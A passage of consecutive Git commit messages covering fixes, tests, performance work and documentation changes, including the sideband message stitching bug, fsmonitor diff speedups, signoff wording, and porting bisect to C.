<https://unix.stackexchange.com/a/245336/3645>, only detect function
names with characters allowed by POSIX.1-2017
<https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap03.html#tag_03_235>
for simplicity. This should cover the vast majority of use cases, and
produces system-agnostic results.
Since a word pattern has to be specified, but there is no easy way to
know the default word pattern, use the default `IFS` characters for a
starter. A later patch can improve this.
Signed-off-by: Victor Engmark <victor@engmark.name>
Acked-by: Johannes Sixt <j6t@kdbg.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We set "use warnings" in most of our perl code to catch problems. But as
the name implies, warnings just emit a message to stderr and don't
otherwise affect the program. So our tests are quite likely to miss that
warnings are being spewed, as most of them do not look at stderr.
We could ask perl to make all warnings fatal, but this is likely
annoying for non-developers, who would rather have a running program
with a warning than something that refuses to work at all.
So instead, let's teach the perl code to respect an environment variable
(GIT_PERL_FATAL_WARNINGS) to increase the severity of the warnings. This
can be set for day-to-day running if people want to be really pedantic,
but the primary use is to trigger it within the test suite.
We could also trigger that for every test run, but likewise even the
tests failing may be annoying to distro builders, etc (just as -Werror
would be for compiling C code). So we'll tie it to a special test-mode
variable (GIT_TEST_PERL_FATAL_WARNINGS) that can be set in the
environment or as a Makefile knob, and we'll automatically turn the knob
when DEVELOPER=1 is set. That should give developers and CI the more
careful view without disrupting normal users or packagers.
Note that the mapping from the GIT_TEST_* form to the GIT_* form in
test-lib.sh is necessary even if they had the same name: the perl
scripts need it to be normalized to a perl truth value, and we also have
to make sure it's exported (we might have gotten it from the
environment, but we might also have gotten it from GIT-BUILD-OPTIONS
directly).
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 0512eabd91 ("sequencer: stop abbreviating stopped-sha file",
2020-09-25), Git was taught both to write full object names to the
stopped-sha file and to require full object names when reading. However,
a user would experience a problem if they started an interactive rebase
using an old version of Git and then continued with a current version of
Git (for example, if the system version of Git was updated in the
meantime).
Teach Git to allow object names of any length when reading.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The commit 9ab33150a0 ("perl: create and switch variables for hash
constants", 2020-06-22) converted each instance of the variable
$sha1_short into $oid_short in the Subversion code, since git-svn now
understands SHA-256. However, one conversion was missed.
As a result, Perl complains about the use of this variable:
Use of uninitialized value $sha1_short in regexp compilation at
/usr/lib64/perl5/vendor_perl/5.30.3/Git/SVN/Log.pm line 301, <$fh>
line 6.
Because we're parsing raw diff output here, the likelihood is very low
that we'll actually misparse the data, since the only lines we're going
to get starting with colons are the ones we're expecting. Even if we
had a newline in a path, we'd end up with a quoted path. Our regex is
just less strict than we'd like it to be.
However, it's obviously undesirable that our code is emitting Perl
warnings, so let's convert it to use the proper variable name.
Reported-by: Nikos Chantziaras <realnc@gmail.com>
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The idea of the `SKIP_DASHED_BUILT_INS` option is to stop hard-linking
the built-in commands as separate executables. The patches to do that
specifically excluded the three commands `receive-pack`,
`upload-archive` and `upload-pack`, though: these commands are expected
to be present in the `PATH` in their dashed form on the server side of
any fetch/push.
However, due to an oversight by myself, even if those commands were
still hard-linked, they were not installed into `bin/`.
Noticed-by: Michael Forney <mforney@mforney.org>
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Commit 2b6ad0f4bc ("rebase --rebase-merges: add support for octopus
merges", 2017-12-21) introduced a case where rollback_lock_file() was
unconditionally called twice in a row with no intervening commands.
Remove the duplicate.
Signed-off-by: Elijah Newren <newren@gmail.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Modernize the test by replacing `test -e` instances with
`test_path_is_file` helper functions, and `! test -e` with
`test_path_is_missing`, for better readability and diagnostic messages.
Signed-off-by: Joey Salazar <jgsal@protonmail.com>
Reviewed-by: Phillip Wood <phillip.wood123@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A patch changing a symlink into a file is written with 2 sections (in
the code, represented as "struct patch"): firstly, the deletion of the
symlink, and secondly, the creation of the file. When applying that
patch with -R, the sections are reversed, so we get:
(1) creation of a symlink, then
(2) deletion of a file.
This causes an issue when the "deletion of a file" section is checked,
because Git observes that the so-called file is not a file but a
symlink, resulting in a "wrong type" error message.
What we want is:
(1) deletion of a file, then
(2) creation of a symlink.
In the code, this is reflected in the behavior of previous_patch() when
invoked from check_preimage() when the deletion is checked. Creation
then deletion means that when the deletion is checked, previous_patch()
returns the creation section, triggering a mode conflict resulting in
the "wrong type" error message. But deletion then creation means that
when the deletion is checked, previous_patch() returns NULL, so the
deletion mode is checked against lstat, which is what we want.
There are also other ways a patch can contain 2 sections referencing the
same file, for example, in 7a07841c0b ("git-apply: handle a patch that
touches the same path more than once better", 2008-06-27). "git apply
-R" fails in the same way, and this commit makes this case succeed.
Therefore, when building the list of sections, build them in reverse
order (by adding to the front of the list instead of the back) when -R
is passed.
Helped-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
It was pretty tricky to verify that incomplete sideband messages are
handled correctly by the `recv_sideband()`/`demultiplex_sideband()`
code: they have to be flushed out at the end of the loop in
`recv_sideband()`, but the actual flushing is done by the
`demultiplex_sideband()` function (which therefore has to know somehow
that the loop will be done after it returns).
To catch future bugs where incomplete sideband messages might not be
shown by mistake, let's catch that condition and report a bug.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 2b695ecd74 (t5500: count objects through stderr, not trace,
2020-05-06) we tried to ensure that the "Total 3" message could be
grepped in Git's output, even if it sometimes got chopped up into
multiple lines in the trace machinery.
However, the first instance where this mattered now goes through the
sideband machinery, where it is _still_ possible for messages to get
chopped up: it *is* possible for the standard error stream to be sent
byte-for-byte and hence it can be easily interrupted. Meaning: it is
possible for the single line that we're looking for to be chopped up
into multiple sideband packets, with a primary packet being delivered
between them.
This seems to happen occasionally in the `vs-test` part of our CI
builds, i.e. with binaries built using Visual C, but not when building
with GCC or clang; The symptom is that t5500.43 fails to find a line
matching `remote: Total 3` in the `log` file, which ends in something
along these lines:
remote: Tota
remote: l 3 (delta 0), reused 0 (delta 0), pack-reused 0
This should not happen, though: we have code in `demultiplex_sideband()`
_specifically_ to stitch back together lines that were delivered in
separate sideband packets.
However, this stitching was broken in a subtle way in fbd76cd450
(sideband: reverse its dependency on pkt-line, 2019-01-16): before that
change, incomplete sideband lines would not be flushed upon receiving a
primary packet, but after that patch, they would be.
The subtleness of this bug comes from the fact that it is easy to get
confused by the ambiguous meaning of the `break` keyword: after writing
the primary packet contents, the `break;` in the original version of
`recv_sideband()` does _not_ break out of the `while` loop, but instead
only ends the `switch` case:
while (!retval) {
[...]
switch (band) {
[...]
case 1:
/* Write the contents of the primary packet */
write_or_die(out, buf + 1, len);
/* Here, we do *not* break out of the loop, `retval` is unchanged */
break;
[...]
}
if (outbuf.len) {
/* Write any remaining sideband messages lacking a trailing LF */
strbuf_addch(&outbuf, '\n');
xwrite(2, outbuf.buf, outbuf.len);
}
In contrast, after fbd76cd450 (sideband: reverse its dependency on
pkt-line, 2019-01-16), the body of the `while` loop was extracted into
`demultiplex_sideband()`, crucially _including_ the logic to write
incomplete sideband messages:
switch (band) {
[...]
case 1:
*sideband_type = SIDEBAND_PRIMARY;
/* This does not break out of the loop: the loop is in the caller */
break;
[...]
}
cleanup:
[...]
/* This logic is now no longer _outside_ the loop but _inside_ */
if (scratch->len) {
strbuf_addch(scratch, '\n');
xwrite(2, scratch->buf, scratch->len);
}
The correct way to fix this is to return from `demultiplex_sideband()`
early. The caller will then write out the contents of the primary packet
and continue looping. The `scratch` buffer for incomplete sideband
messages is owned by that caller, and will continue to accumulate the
remainder(s) of those messages. The loop will only end once
`demultiplex_sideband()` returned non-zero _and_ did not indicate a
primary packet, which is the case only when we hit the `cleanup:` path,
in which we take care of flushing any unfinished sideband messages and
release the `scratch` buffer.
To ensure that this does not get broken again, we introduce a pair of
subcommands of the `pkt-line` test helper that specifically chop up the
sideband message and squeeze a primary packet into the middle.
Final note: The other test case touched by 2b695ecd74 (t5500: count
objects through stderr, not trace, 2020-05-06) is not affected by this
issue because the sideband machinery is not involved there.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
t7102 and t7201 still follow the old style of having blank
lines around test body, which is not consistence with our
current practice.
Let's remove those unnecessary blank lines.
Signed-off-by: Charvi Mendiratta <charvi077@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Some tests in these scripts are formatted using a very old style:
test_expect_success \
'title' \
'body line 1 &&
body line 2'
Updating the formatting to the modern style:
test_expect_success 'title' '
body line 1 &&
body line 2
'
Signed-off-by: Charvi Mendiratta <charvi077@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add a new diff option that enables ignoring changes whose all lines
(changed, removed, and added) match a given regular expression. This is
similar to the -I/--ignore-matching-lines option in standalone diff
utilities and can be used e.g. to ignore changes which only affect code
comments or to look for unrelated changes in commits containing a large
number of automatically applied modifications (e.g. a tree-wide string
replacement). The difference between -G/-S and the new -I option is
that the latter filters output on a per-change basis.
Use the 'ignore' field of xdchange_t for marking a change as ignored or
not. Since the same field is used by --ignore-blank-lines, identical
hunk emitting rules apply for --ignore-blank-lines and -I. These two
options can also be used together in the same git invocation (they are
complementary to each other).
Rename xdl_mark_ignorable() to xdl_mark_ignorable_lines(), to indicate
that it is logically a "sibling" of xdl_mark_ignorable_regex() rather
than its "parent".
Signed-off-by: Michał Kępień <michal@isc.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
xpparam_t structures are usually zero-initialized before their specific
fields are assigned to, but there are three locations in the tree where
that does not happen. Add the missing memset() calls in order to make
initialization of xpparam_t structures consistent tree-wide and to
prevent stack garbage from being used as field values.
Signed-off-by: Michał Kępień <michal@isc.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Much of the benchmark code is redundant. This is
easier to understand and edit.
Signed-off-by: Nipunn Koorapati <nipunn@dropbox.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Perf tests have not been linted for some time.
They've grown some seq instead of test_seq. This
runs the existing lints on the perf tests as well.
Signed-off-by: Nipunn Koorapati <nipunn@dropbox.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Results for the git-diff fsmonitor optimization
in patch in the parent-rev (using a 400k file repo to test)
As you can see here - git diff with fsmonitor running is
significantly better with this patch series (80% faster on my
workload)!
GIT_PERF_LARGE_REPO=~/src/server ./run v2.29.0-rc1 . -- p7519-fsmonitor.sh
Test v2.29.0-rc1 this tree
-----------------------------------------------------------------------------------------------------------------
7519.2: status (fsmonitor=.git/hooks/fsmonitor-watchman) 1.46(0.82+0.64) 1.47(0.83+0.62) +0.7%
7519.3: status -uno (fsmonitor=.git/hooks/fsmonitor-watchman) 0.16(0.12+0.04) 0.17(0.12+0.05) +6.3%
7519.4: status -uall (fsmonitor=.git/hooks/fsmonitor-watchman) 1.36(0.73+0.62) 1.37(0.76+0.60) +0.7%
7519.5: diff (fsmonitor=.git/hooks/fsmonitor-watchman) 0.85(0.22+0.63) 0.14(0.10+0.05) -83.5%
7519.6: diff -- 0_files (fsmonitor=.git/hooks/fsmonitor-watchman) 0.12(0.08+0.05) 0.13(0.11+0.02) +8.3%
7519.7: diff -- 10_files (fsmonitor=.git/hooks/fsmonitor-watchman) 0.12(0.08+0.04) 0.13(0.09+0.04) +8.3%
7519.8: diff -- 100_files (fsmonitor=.git/hooks/fsmonitor-watchman) 0.12(0.07+0.05) 0.13(0.07+0.06) +8.3%
7519.9: diff -- 1000_files (fsmonitor=.git/hooks/fsmonitor-watchman) 0.12(0.09+0.04) 0.13(0.08+0.05) +8.3%
7519.10: diff -- 10000_files (fsmonitor=.git/hooks/fsmonitor-watchman) 0.14(0.09+0.05) 0.13(0.10+0.03) -7.1%
7519.12: status (fsmonitor=) 1.67(0.93+1.49) 1.67(0.99+1.42) +0.0%
7519.13: status -uno (fsmonitor=) 0.37(0.30+0.82) 0.37(0.33+0.79) +0.0%
7519.14: status -uall (fsmonitor=) 1.58(0.97+1.35) 1.57(0.86+1.45) -0.6%
7519.15: diff (fsmonitor=) 0.34(0.28+0.83) 0.34(0.27+0.83) +0.0%
7519.16: diff -- 0_files (fsmonitor=) 0.09(0.06+0.04) 0.09(0.08+0.02) +0.0%
7519.17: diff -- 10_files (fsmonitor=) 0.09(0.07+0.03) 0.09(0.06+0.05) +0.0%
7519.18: diff -- 100_files (fsmonitor=) 0.09(0.06+0.04) 0.09(0.06+0.04) +0.0%
7519.19: diff -- 1000_files (fsmonitor=) 0.09(0.06+0.04) 0.09(0.05+0.05) +0.0%
7519.20: diff -- 10000_files (fsmonitor=) 0.10(0.08+0.04) 0.10(0.06+0.05) +0.0%
I also added a benchmark for a tiny git diff workload w/ a pathspec.
I see an approximately .02 second overhead added w/ and w/o fsmonitor
From looking at these results, I suspected that refresh_fsmonitor
is already happening during git diff - independent of this patch
series' optimization. Confirmed that suspicion by breaking on
refresh_fsmonitor.
(gdb) bt [simplified]
0 refresh_fsmonitor at fsmonitor.c:176
1 ie_match_stat at read-cache.c:375
2 match_stat_with_submodule at diff-lib.c:237
4 builtin_diff_files at builtin/diff.c:260
5 cmd_diff at builtin/diff.c:541
6 run_builtin at git.c:450
7 handle_builtin at git.c:700
8 run_argv at git.c:767
9 cmd_main at git.c:898
10 main at common-main.c:52
Signed-off-by: Nipunn Koorapati <nipunn@dropbox.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The first git status would be inflated due to warming of
filesystem cache. This makes the results comparable.
Before
Test this tree
--------------------------------------------------------------------------------
7519.2: status (fsmonitor=.git/hooks/fsmonitor-watchman) 2.52(1.59+1.56)
7519.3: status -uno (fsmonitor=.git/hooks/fsmonitor-watchman) 0.18(0.12+0.06)
7519.4: status -uall (fsmonitor=.git/hooks/fsmonitor-watchman) 1.36(0.73+0.62)
7519.7: status (fsmonitor=) 0.69(0.52+0.90)
7519.8: status -uno (fsmonitor=) 0.37(0.28+0.81)
7519.9: status -uall (fsmonitor=) 1.53(0.93+1.32)
After
Test this tree
--------------------------------------------------------------------------------
7519.2: status (fsmonitor=.git/hooks/fsmonitor-watchman) 0.39(0.33+0.06)
7519.3: status -uno (fsmonitor=.git/hooks/fsmonitor-watchman) 0.17(0.13+0.05)
7519.4: status -uall (fsmonitor=.git/hooks/fsmonitor-watchman) 1.34(0.77+0.56)
7519.7: status (fsmonitor=) 0.70(0.53+0.90)
7519.8: status -uno (fsmonitor=) 0.37(0.32+0.78)
7519.9: status -uall (fsmonitor=) 1.55(1.01+1.25)
Signed-off-by: Nipunn Koorapati <nipunn@dropbox.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
With fsmonitor enabled, the first call to match_stat_with_submodule
calls refresh_fsmonitor, incurring the overhead of reading the list of
updated files -- but run_diff_files does not respect the
CE_FSMONITOR_VALID flag.
Make use of the fsmonitor extension to skip lstat() calls on files
that fsmonitor judged as unmodified.
Notably, this change improves performance of the git shell prompt when
GIT_PS1_SHOWDIRTYSTATE is set.
Signed-off-by: Alex Vandiver <alexmv@dropbox.com>
Signed-off-by: Nipunn Koorapati <nipunn@dropbox.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This reverts commit d572f52a64c6a69990f72ad6a09504b9b615d2e4; the
idea to detect that "test_cmp expect actual" was fed a misspelt
filename meant well, but when the version of Git tested exhibits a
bug, the reason why these two files do not match may be because one
of them did not get created as expected, in which case missing file
is not a sign of misspelt filename but is a genuine test failure.
Acked-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Ted reported an old typo in the git-commit.txt and merge-options.txt.
Namely, the phrase "Signed-off-by line" was used without either a
definite nor indefinite article.
Upon examination, it seems that the documentation (including items in
Documentation/, but also option help strings) have been quite
inconsistent on usage when referring to `Signed-off-by`.
First, very few places used a definite or indefinite article with the
phrase "Signed-off-by line", but that was the initial typo that led
to this investigation. So, normalize using either an indefinite or
definite article consistently.
The original phrasing, in Commit 3f971fc425 (Documentation updates,
2005-08-14), is "Add Signed-off-by line". Commit 6f855371a5 (Add
--signoff, --check, and long option-names. 2005-12-09) switched to
using "Add `Signed-off-by:` line", but didn't normalize the former
commit to match. Later commits seem to have cut and pasted from one
or the other, which is likely how the usage became so inconsistent.
Junio stated on the git mailing list in
<xmqqy2k1dfoh.fsf@gitster.c.googlers.com> a preference to leave off
the colon. Thus, prefer `Signed-off-by` (with backticks) for the
documentation files and Signed-off-by (without backticks) for option
help strings.
Additionally, Junio argued that "trailer" is now the standard term to
refer to `Signed-off-by`, saying that "becomes plenty clear that we
are not talking about any random line in the log message". As such,
prefer "trailer" over "line" anywhere the former word fits.
However, leave alone those few places in documentation that use
Signed-off-by to refer to the process (rather than the specific
trailer), or in places where mail headers are generally discussed in
comparison with Signed-off-by.
Reported-by: "Theodore Y. Ts'o" <tytso@mit.edu>
Signed-off-by: Bradley M. Kuhn <bkuhn@sfconservancy.org>
Acked-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The description on sign-off and DCO was written back in the days
where there was only a choice between "use sign-off and it means the
contributor agrees to the Linux-kernel style DCO" and "not using
sign-off at all will make your patch unusable". These days, we are
trying to clarify that the exact meaning of a sign-off varies
project to project.
Let's be more explicit when presenting what _our_ rules are. It is
of secondary importance that it originally came from the kernel
project, so move the description as a historical note at the end,
while cautioning that what a sign-off means to us may be different from
what it means to other projects contributors may have been used to.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Reviewed-by: Bradley M. Kuhn <bkuhn@sfconservancy.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Building on past documentation improvements in b2c150d3aa (Expand
documentation describing --signoff, 2016-01-05), further clarify
that any project using Git may and often does set its own policy.
However, leave intact reference to the Linux DCO, which Git also
uses. It is reasonable for Git to advocate for its own Signed-off-by
methodology in its documentation, as long as the documentation
remains respectful that YMMV and other projects may well have very
different contributor representations tied to Signed-off-by.
Signed-off-by: Bradley M. Kuhn <bkuhn@sfconservancy.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Jeff King <peff@peff.net>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Almost identical text on the signed-off-by trailer appears in the
documentation for "git commit" and "git merge" and its friends.
Introduce a new signoff-option.txt file to be shared. A couple of
things of note are:
- The short-form "-s" is available only in "git commit", but not in
commands that are friends of "git merge", as it is used as a
short-hand for "--strategy".
- The original lacks description on the negated "--no-signoff" form
on "git commit" side, but it equally is applicable. It however
was unclear in the original text that not adding a Signed-off-by
trailer is the default, so rephrase to explain it as a way to
countermand a --signoff option that appeared earlier on the same
command line.
This is in preparation to apply a further clarification on what
exactly the Signed-off-by trailer means.
Suggested-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Reviewed-by: Bradley M. Kuhn <bkuhn@sfconservancy.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Avoid placing `git` upstream in a pipe since doing so throws away
its exit code, thus an unexpected failure may go unnoticed.
Signed-off-by: Amanda Shafack <shafack.likhene@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When using the --run flag to run just two or three tests from a test
file which contains several dozen tests, having every skipped test print
out dozens of lines of output for the test code for that skipped test
(in addition to the TAP output line) adds up to hundreds or thousands of
lines of irrelevant output that make it very hard to fish out the
relevant results you were looking for. Simplify the output for skipped
tests to remove this extra output, leaving only the TAP output line
(i.e. the line reading "ok <number> # skip <test-description>", which
already mentions that the test was "skip"ped).
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
With the new ability to pass --run=setup to select which tests to run,
it is more convenient if tests use the term "setup" instead of synonyms
like 'prepare' or 'rebuild'. There are undoubtedly many other tests in
our testsuite that could be changed over too, these are just a couple
that I ran into.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Many of our test scripts have several "setup" tests. It's a lot easier
to say
./t0050-filesystem.sh --run=setup,9
in order to run all the setup tests as well as test #9, than it is to
track down what all the setup tests are and enter all their numbers in
the list. Also, I often find myself wanting to run just one or a couple
tests from the test file, but I don't know the numbering of any of the
tests -- to get it I either have to first run the whole test file (or
start counting by hand or figure out some other clever but non-obvious
tricks). It's really convenient to be able to just look at the test
description(s) and then run
./t6416-recursive-corner-cases.sh --run=symlink
or
./t6402-merge-rename.sh --run='setup,unnecessary update'
Add such an ability to test selection which relies on merely matching
against the test description.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
t7518.1 added in commit 862e80a413 ("ident: handle NULL email when
complaining of empty name", 2017-02-23), was trying to make sure that
the test with an empty ident did not segfault and did not result in
glibc quiety translating a NULL pointer into a name of "(null)". It did
the latter by ensuring that a grep for "null" didn't appear in the
output, but on one automatic CI run I observed the following output:
fatal: empty ident name (for <runner@fv-az128-670.gcliasfzo2nullsdbrimjtbyhg.cx.internal.cloudapp.net>) not allowed
Note that 'null' appears as a substring of the domain name, found
within 'gcliasfzo2nullsdbrimjtbyhg'. Tighten the test by searching for
"(null)" rather than "null".
Signed-off-by: Elijah Newren <newren@gmail.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add test cases of various combinations of the commit.gpgsign option and
--gpg-sign, --no-gpg-sign flags with rebase -r with the default merge
strategy. This excercises a different code-path from those with octopus
merges or overridden merge strategy with rebase -s.
Signed-off-by: Samuel Čavoj <samuel@cavoj.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The merge subcommand launched for merges with non-default strategy would
use its own default behaviour to decide how to sign commits, regardless
of what opts->gpg_sign was set to. For example the --no-gpg-sign flag
given to rebase explicitly would get ignored, if commit.gpgsign was set
to true.
Fix the issue and add a test case excercising this behaviour.
Signed-off-by: Samuel Čavoj <samuel@cavoj.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When performing a rebase with --rebase-merges using either a custom
strategy specified with -s or an octopus merge, and at the same time
having gpgsign enabled (either rebase -S or config commit.gpgsign), the
operation would fail on making the merge commit. Instead of "-S%s" with
the key id substituted, only the bare key id would get passed to the
underlying merge command, which tried to interpret it as a ref.
Fix the issue and add test cases as suggested by Johannes Schindelin and
Junio C Hamano.
Signed-off-by: Samuel Čavoj <samuel@cavoj.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
* https://github.com/prati0100/git-gui:
git-gui: blame: prevent tool tips from sticking around after Command-Tab
git-gui: improve dark mode support
git-gui: fix mixed tabs and spaces; prefer tabs
Make sure `git gui blame` tooltips are destroyed once the window loses
focus on MacOS.
* sh/blame-tooltip:
git-gui: blame: prevent tool tips from sticking around after Command-Tab
On Mac, tooltips are not automatically removed when a window loses
focus. Furthermore, mouse-move events are only dispatched to the active
window, which means that if we Command-tab to another application while
a tool tip is showing, the tool tip will stay there forever (in front of
other applications). So we must hide it manually when we lose focus.
Do this unconditionally here (i.e. without if {[is_MacOSX]}); it
shouldn't hurt on other platforms, even though they don't seem to have
this problem.
Signed-off-by: Stefan Haller <stefan@haller-berlin.de>
Signed-off-by: Pratyush Yadav <me@yadavpratyush.com>
Per IRC:
[19:52] <lkmandy> With respect to the MyFirstContribution tutorial, I
will like to suggest this - Under the section "Adding Documentation",
just before the "make all doc" command, it will be really helpful to
prompt a user to check if they have the asciidoc package installed, if
they don't, the command should be provided or they can just be pointed
to install it
So, let's move the note about the dependency to before the build command
blockquote.
Signed-off-by: Emily Shaffer <emilyshaffer@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Make `git credential fill` honour the core.askPass variable.
Signed-off-by: Thomas Koutcher <thomas.koutcher@online.fr>
[jk: added test]
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Testcases 12b and 12c were both slightly weird; they were marked as
having a weird resolution, but with the note that even straightforward
simple rules can give weird results when the input is bizarre.
However, during optimization work for merge-ort, I discovered a
significant speedup that is possible if we add one more fairly
straightforward rule: we don't bother doing directory rename detection
if there are no new files added to the directory on the other side of
the history to be affected by the directory rename. This seems like an
obvious and straightforward rule, but there was one funny corner case
where directory rename detection could affect only existing files: the
funny corner case where two directories are renamed into each other on
opposite sides of history. In other words, it only results in a
different output for testcases 12b and 12c.
Since we already thought testcases 12b and 12c were weird anyway, and
because the optimization often has a significant effect on common cases
(but is entirely prevented if we can't change how 12b and 12c function),
let's add the additional rule and tweak how 12b and 12c work. Split
both testcases into two (one where we add no new files, and one where
the side that doesn't rename a given directory will add files to it),
and mark them with the new expectation.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
While investigating the issues highlighted by the testcase in the
previous patch, I also found a shortcoming in the directory rename
detection rules. Split testcase 6b into two to explain this issue
and update directory-rename-detection.txt to remove one of the previous
rules that I know believe to be detrimental. Also, update the wording
around testcase 8e; while we are not modifying the results of that
testcase, we were previously unsure of the appropriate resolution of
that test and the new rule makes the previously chosen resolution for
that testcase a bit more solid.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add a new testcase modelled on a real world repository example that
served multiple purposes:
* it uncovered a bug in the current directory rename detection
implementation.
* it is a good test of needing to do directory rename detection for
a series of commits instead of just one (and uses rebase instead
of just merge like all the other tests in this testfile).
* it is an excellent stress test for some of the optimizations in
my new merge-ort engine
I can expand on the final item later when I have submitted more of
merge-ort, but the bug is the main immediate concern. It arises as
follows:
* dir/subdir/ has several files
* almost all files in dir/subdir/ are renamed to folder/subdir/
* one of the files in dir/subdir/ is renamed to folder/subdir/newsubdir/
* If the other side of history (that doesn't do the renames) adds a
new file to dir/subdir/, where should it be placed after the merge?
The most obvious two choices are: (1) leave the new file in dir/subdir/,
don't make it follow the rename, and (2) move the new file to
folder/subdir/, following the rename of most the files. However,
there's a possible third choice here: (3) move the new file to
folder/subdir/newsubdir/. The choice reinforce the fact that
merge.directoryRenames=conflict is a good default, but when the merge
machinery needs to stick it somewhere and notify the user of the
possibility that they might want to place it elsewhere. Surprisingly,
the current code would always choose (3), while the real world
repository was clearly expecting (2) -- move the file along with where
the herd of files was going, not with the special exception.
The problem here is that for the majority of the file renames,
dir/subdir/ -> folder/subdir/
is actually represented as
dir/ -> folder/
This directory rename would have a big weight associated with it since
most the files followed that rename. However, we always consult the
most immediate directory first, and there is only one rename rule for
it:
dir/subdir/ -> folder/subdir/newsubdir/
Since this rule is the only one for mapping from dir/subdir/, it
automatically wins and that directory rename was followed instead of the
desired dir/subdir/ -> folder/subdir/.
Unfortunately, the fix is a bit involved so for now just add the
testcase documenting the issue.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The regression tests for directory rename detection were renamed from
t6043 to t6423 in commit 919df31955 ("Collect merge-related tests to
t64xx", 2020-08-10); update this file to match. Also, add a small
clarification to nearby text while we're at it.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Reimplement the `bisect_state()` shell functions in C and also add a
subcommand `--bisect-state` to `git-bisect--helper` to call them from
git-bisect.sh .
Using `--bisect-state` subcommand is a temporary measure to port shell
function to C so as to use the existing test suite. As more functions
are ported, this subcommand will be retired and will be called by some
other methods.
`bisect_head()` is only called from `bisect_state()`, thus it is not
required to introduce another subcommand.
Note that the `eval` in the changed line of `git-bisect.sh` cannot be
dropped: it is necessary because the `rev` and the `tail`
variables may contain multiple, quoted arguments that need to be
passed to `bisect--helper` (without the quotes, naturally).
Mentored-by: Lars Schneider <larsxschneider@gmail.com>
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Johannes Schindelin <Johannes.Schindelin@gmx.de>
Signed-off-by: Pranit Bauva <pranit.bauva@gmail.com>
Signed-off-by: Tanushree Tumane <tanushreetumane@gmail.com>
Signed-off-by: Miriam Rubio <mirucam@gmail.com>
Reviewed-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add the subcommand to `git bisect--helper` and call it from
git-bisect.sh.
With the conversion of `bisect_auto_next()` from shell to C in a
previous commit, `bisect_start()` can now be fully ported to C.
So let's complete the `--bisect-start` subcommand of
`git bisect--helper` so that it fully implements `bisect_start()`,
and let's use this subcommand in `git-bisect.sh` instead of
`bisect_start()`.
Note that the `eval` in the changed line of `git-bisect.sh` cannot be
dropped: it is necessary because the `rev` and the `tail`
variables may contain multiple, quoted arguments that need to be
passed to `bisect--helper` (without the quotes, naturally).
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Johannes Schindelin <Johannes.Schindelin@gmx.de>
Signed-off-by: Pranit Bauva <pranit.bauva@gmail.com>
Signed-off-by: Tanushree Tumane <tanushreetumane@gmail.com>
Signed-off-by: Miriam Rubio <mirucam@gmail.com>
Reviewed-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
